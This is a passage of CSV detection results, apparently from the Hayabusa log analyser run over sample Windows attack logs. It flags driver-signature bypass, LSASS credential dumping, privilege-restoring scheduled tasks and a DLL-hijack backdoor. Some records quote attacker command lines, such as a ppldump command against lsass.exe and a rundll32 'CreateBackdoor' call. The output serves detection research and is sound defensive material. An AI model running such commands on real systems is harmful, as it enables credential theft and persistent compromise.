SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:13.098 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:13.147 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: 
SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:25.164 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | 
Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:27.797 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 
747F3D96-2B98-5E41-0000-00109C904700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx 2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx 2020-03-07 22:17:38.534 +09:00,MSEDGEWIN10,4698,info,,Task Created,"Name: \FullPowersTask | Content: \FullPowersTask S-1-5-19 LeastPrivilege SeAssignPrimaryTokenPrivilege SeAuditPrivilege SeChangeNotifyPrivilege SeCreateGlobalPrivilege SeImpersonatePrivilege SeIncreaseQuotaPrivilege SeIncreaseWorkingSetPrivilege IgnoreNew true true true false false PT10M PT1H true false true true false false false false false PT72H 7 C:\Users\Public\Tools\TokenManip\FullPowers.exe -t 4932 | User: LOCAL SERVICE | LID: 0x3e5",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx 2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,info,,Task Deleted,Name: \FullPowersTask | User: LOCAL SERVICE | LID: 
0x3e5,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx 2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx 2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx 2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx 2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx 2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:16.507 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | 
Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.982 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.996 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.998 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.003 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.005 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.018 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.024 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.042 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.050 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:19.873 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:19.877 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: 
